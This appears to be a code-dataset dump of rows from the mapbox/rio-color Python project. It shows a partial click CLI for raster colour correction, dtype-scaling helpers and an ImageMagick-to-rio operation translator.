@click.argument("dst_path", type=click.Path(exists=False))
@click.argument("operations", nargs=-1, required=True)
@click.pass_context
@creation_options
def color(ctx, jobs, out_dtype, src_path, dst_path, operations, creation_options):
"""Color correction
Operations will be applied to the src image in the specified order.
Available OPERATIONS include:
\b
"gamma BANDS VALUE"
Applies a gamma curve, brightening or darkening midtones.
VALUE > 1 brightens the image.
\b
"sigmoidal BANDS CONTRAST BIAS"
Adjusts the contrast and brightness of midtones.
BIAS > 0.5 darkens the image.
\b
"saturation PROPORTION"
Controls the saturation in LCH color space.
PROPORTION = 0 results in a grayscale image
PROPORTION = 1 results in an identical image
PROPORTION = 2 is likely way too saturated
BANDS are specified as a single arg, no delimiters
\b
`123` or `RGB` or `rgb` are all equivalent
Example:
\b
rio color -d uint8 -j 4 input.tif output.tif \\
gamma 3 0.95, sigmoidal rgb 35 0.13
"""
with rasterio.open(src_path) as src:
opts = src.profile.copy()
windows = [(window, ij) for ij, window in src.block_windows()]
opts.update(**creation_options)
opts["transform"] = guard_transform(opts["transform"])
out_dtype = out_dtype if out_dtype else opts["dtype"]
opts["dtype"] = out_dtype
args = {"ops_string": " ".join(operations), "out_dtype": out_dtype}
# Just run this for validation this time
# parsing will be run again within the worker
# where its returned value will be used
try:
parse_operations(args["ops_string"])
except ValueError as e:
raise click.UsageError(str(e))
jobs = check_jobs(jobs)
if jobs > 1:
with riomucho.RioMucho(
[src_path],
dst_path,
color_worker,
windows=windows,
options=opts,
global_args=args,
mode="manual_read",
) as mucho:
mucho.run(jobs)
else:
with rasterio.open(dst_path, "w", **opts) as dest:
with rasterio.open(src_path) as src:
rasters = [src]
for window, ij in windows:
arr = color_worker(rasters, window, ij, args)
dest.write(arr, window=window)
dest.colorinterp = src.colorinterp
@click.command("atmos")
@click.option(
"--atmo",
"-a",
type=click.FLOAT,
default=0.03,
help="How much to dampen cool colors, thus cutting through "
"haze. 0..1 (0 is none), default: 0.03.",
)
@click.option(
"--contrast",
"-c",
type=click.FLOAT,
default=10,
help="Contrast factor to apply to the scene. -infinity..infinity"
"(0 is none), default: 10.",
)
@click.option(
"--bias",
"-b",
type=click.FLOAT,
default=0.15,
help="Skew (brighten/darken) the output. Lower values make it "
"brighter. 0..1 (0.5 is none), default: 0.15",
)
@click.option(
"--out-dtype",
"-d",
type=click.Choice(["uint8", "uint16"]),
help="Integer data type for output data, default: same as input",
)
@click.option(
"--as-color",
is_flag=True,
default=False,
help="Prints the equivalent rio color command to stdout."
"Does NOT run either command, SRC_PATH will not be created",
)
@click.argument("src_path", required=True)
@click.argument("dst_path", type=click.Path(exists=False))
@jobs_opt
@creation_options
@click.pass_context
|
mapbox/rio-color | rio_color/utils.py | to_math_type | python | def to_math_type(arr):
max_int = np.iinfo(arr.dtype).max
return arr.astype(math_type) / max_int | Convert an array from native integer dtype range to 0..1
scaling down linearly | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/utils.py#L15-L20 | null | """Color utilities."""
import numpy as np
import re
# The type to be used for all intermediate math
# operations. Should be a float because values will
# be scaled to the range 0..1 for all work.
math_type = np.float64
epsilon = np.finfo(math_type).eps
def scale_dtype(arr, dtype):
    """Scale an array of floats in 0..1 up linearly to an integer dtype.

    Multiplies by the target dtype's maximum value, then casts.
    """
    dtype_max = np.iinfo(dtype).max
    scaled = arr * dtype_max
    return scaled.astype(dtype)
def magick_to_rio(convert_opts):
    """Translate a limited subset of imagemagick convert commands
    to rio color operations

    Parameters
    ----------
    convert_opts: String, imagemagick convert options

    Returns
    -------
    operations string, ordered rio color operations
    """
    ops = []
    # Band selector currently in effect, shared with the helpers below
    # via ``nonlocal``. The previous implementation declared
    # ``global bands`` inside the helpers, which leaked state into the
    # module namespace and left this local permanently None.
    bands = None

    def set_band(x):
        # Record the active band selector, normalized to upper case.
        nonlocal bands
        bands = x.upper()

    set_band("RGB")

    def append_sig(arg):
        # "-sigmoidal-contrast C" or "-sigmoidal-contrast CxB%"
        args = list(filter(None, re.split("[,x]+", arg)))
        if len(args) == 1:
            # Bias defaults to the midpoint.
            args.append(0.5)
        elif len(args) == 2:
            # Percent notation, e.g. "35x13%" -> bias 0.13
            args[1] = float(args[1].replace("%", "")) / 100.0
        ops.append("sigmoidal {} {} {}".format(bands, *args))

    def append_gamma(arg):
        # "-gamma G" applied to the active band selector.
        ops.append("gamma {} {}".format(bands, arg))

    def append_sat(arg):
        # "-modulate BRIGHTNESS,SATURATION": brightness (args[0]) is
        # ignored; saturation percent is converted to a proportion.
        args = list(filter(None, re.split("[,x]+", arg)))
        prop = float(args[1]) / 100
        ops.append("saturation {}".format(prop))

    # Tokens alternate between flags (which select the handler) and
    # their single argument (which the pending handler consumes).
    nextf = None
    for part in convert_opts.strip().split(" "):
        if part == "-channel":
            nextf = set_band
        elif part == "+channel":
            set_band("RGB")
            nextf = None
        elif part == "-sigmoidal-contrast":
            nextf = append_sig
        elif part == "-gamma":
            nextf = append_gamma
        elif part == "-modulate":
            nextf = append_sat
        else:
            if nextf:
                nextf(part)
            nextf = None

    return " ".join(ops)
|
mapbox/rio-color | rio_color/utils.py | scale_dtype | python | def scale_dtype(arr, dtype):
max_int = np.iinfo(dtype).max
return (arr * max_int).astype(dtype) | Convert an array from 0..1 to dtype, scaling up linearly | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/utils.py#L23-L27 | null | """Color utilities."""
import numpy as np
import re
# The type to be used for all intermediate math
# operations. Should be a float because values will
# be scaled to the range 0..1 for all work.
math_type = np.float64
epsilon = np.finfo(math_type).eps
def to_math_type(arr):
    """Scale a native-integer-dtype array down linearly to 0..1 floats.

    Casts to the module-wide ``math_type`` and divides by the maximum
    of ``arr``'s integer dtype.
    """
    dtype_max = np.iinfo(arr.dtype).max
    return arr.astype(math_type) / dtype_max
def magick_to_rio(convert_opts):
    """Translate a limited subset of imagemagick convert commands
    to rio color operations

    Parameters
    ----------
    convert_opts: String, imagemagick convert options

    Returns
    -------
    operations string, ordered rio color operations
    """
    ops = []
    # Band selector currently in effect, shared with the helpers below
    # via ``nonlocal``. The previous implementation declared
    # ``global bands`` inside the helpers, which leaked state into the
    # module namespace and left this local permanently None.
    bands = None

    def set_band(x):
        # Record the active band selector, normalized to upper case.
        nonlocal bands
        bands = x.upper()

    set_band("RGB")

    def append_sig(arg):
        # "-sigmoidal-contrast C" or "-sigmoidal-contrast CxB%"
        args = list(filter(None, re.split("[,x]+", arg)))
        if len(args) == 1:
            # Bias defaults to the midpoint.
            args.append(0.5)
        elif len(args) == 2:
            # Percent notation, e.g. "35x13%" -> bias 0.13
            args[1] = float(args[1].replace("%", "")) / 100.0
        ops.append("sigmoidal {} {} {}".format(bands, *args))

    def append_gamma(arg):
        # "-gamma G" applied to the active band selector.
        ops.append("gamma {} {}".format(bands, arg))

    def append_sat(arg):
        # "-modulate BRIGHTNESS,SATURATION": brightness (args[0]) is
        # ignored; saturation percent is converted to a proportion.
        args = list(filter(None, re.split("[,x]+", arg)))
        prop = float(args[1]) / 100
        ops.append("saturation {}".format(prop))

    # Tokens alternate between flags (which select the handler) and
    # their single argument (which the pending handler consumes).
    nextf = None
    for part in convert_opts.strip().split(" "):
        if part == "-channel":
            nextf = set_band
        elif part == "+channel":
            set_band("RGB")
            nextf = None
        elif part == "-sigmoidal-contrast":
            nextf = append_sig
        elif part == "-gamma":
            nextf = append_gamma
        elif part == "-modulate":
            nextf = append_sat
        else:
            if nextf:
                nextf(part)
            nextf = None

    return " ".join(ops)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.